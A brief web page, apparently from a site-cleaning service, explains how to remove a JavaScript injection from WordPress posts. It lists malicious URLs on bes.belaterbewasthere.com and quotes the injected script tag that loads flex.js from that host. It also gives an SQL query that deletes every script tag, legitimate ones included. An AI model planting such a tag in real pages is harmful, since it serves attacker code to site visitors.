WordPress infected with bes.belaterbewasthere.com?

Last updated: October 27 2019

To clean this Javascript injection, try the following methods:

– Backup your site first ( files and database ): https://wordpress.org/support/article/wordpress-backups/

a) SQL cleanup query:

UPDATE wp_posts SET post_content = REGEXP_REPLACE(post_content, '<script(.*?)>((.|\n)*?)<\/script>', '');


b) Try Better Search Replace plugin:
https://wordpress.org/plugins/better-search-replace/

Other malicious URLs found:

bes.belaterbewasthere.com/corn/flex.js
bes.belaterbewasthere.com/reserv/t3.js
bes.belaterbewasthere.com/reserv/reserv/a3.js

Malicious code:

<script type=text/javascript src=\'https://bes.belaterbewasthere.com/corn/flex.js?tp=1&tp=3\'></script>

Need help? Let us clean your site.